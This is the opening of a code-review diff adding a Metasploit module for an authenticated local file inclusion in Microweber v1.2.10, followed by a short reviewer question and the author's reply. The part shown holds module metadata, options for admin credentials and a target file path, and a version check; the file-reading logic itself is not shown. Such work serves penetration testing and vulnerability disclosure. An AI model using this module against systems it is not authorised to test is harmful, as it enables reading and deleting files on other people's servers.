modules/auxiliary/gather/microweber_lfi.rb

```diff
@@ -0,0 +1,174 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  Rank = ExcellentRanking
+  
+  include Msf::Exploit::Remote::HttpClient
+  
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Microweber v1.2.10 Local File Inclusion (Authenticated)",
+      'Description'    => %q{
+        Microweber v1.2.10 has a backup functionality. Upload and download endpoints can be combined to read any file from the filesystem.
+        Upload function may delete the local file if the web service user has access.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Talha Karakumru'
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://huntr.dev/bounties/09218d3f-1f6a-48ae-981c-85e86ad5ed8b/']
+        ],
+      'Notes'          =>
+        {
+          'SideEffects' => [ 'ARTIFACTS_ON_DISK', 'IOC_IN_LOGS' ],
+          'Reliability' => [ 'REPEATABLE_SESSION' ],
+          'Stability'   => [ 'OS_RESOURCE_LOSS' ]
+        },
+      'Targets'        =>
+        [
+          [ 'Microweber v1.2.10', {} ]
+        ],
+      'Privileged'     => true,
+      'DisclosureDate' => "2022-01-30"
+      ))
+  
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path for Microweber', '/']),
+        OptString.new('ADMIN_USER', [true, 'The admin\'s username for Microweber']),
+        OptString.new('ADMIN_PASS', [true, 'The admin\'s password for Microweber']),
+        OptString.new('LOCAL_FILE_PATH', [true, 'The path of the local file.']),
+      ])
+  end
+
+  def check
+    check_version ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Safe
+  end
+  
+  def check_version
+    print_warning 'Triggering this vulnerability may delete the local file that is wanted to be read.'
+    print_status 'Checking Microweber\'s version.'
+  
+    res = send_request_cgi({
+      'method'    => 'GET',
+      'uri'       => normalize_uri(target_uri.path, 'admin', 'login')
+    })
+  
+    version = res.body[/Version:\s+\d+\.\d+\.\d+/].gsub(' ', '').gsub(':', ': ')
+  
+    if version.include?('Version: 1.2.10')
```

Comment:
Are older versions also vulnerable?

Reply:
I have not checked it. I tested the vulnerability against version 1.2.10.